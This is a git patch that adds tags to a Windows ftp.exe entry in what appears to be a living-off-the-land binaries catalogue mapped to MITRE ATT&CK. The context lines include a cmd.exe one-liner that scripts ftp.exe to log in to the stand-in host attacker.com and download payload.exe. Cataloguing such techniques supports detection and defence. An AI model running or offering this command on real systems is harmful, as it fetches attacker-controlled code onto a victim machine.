From eb06fb5266a0ba15a7277f4123934a7685f4054d Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 13:13:21 +0200
Subject: [PATCH] Update Ftp.yml Tags

Added Tags:
- Execute CMD
- Input Custom Format
---
 yml/OSBinaries/Ftp.yml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml
index 62b9a82..21ea0a6 100644
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -11,6 +11,9 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Execute: CMD
+      - Input: Custom Format
   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
     Description: Download
     Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.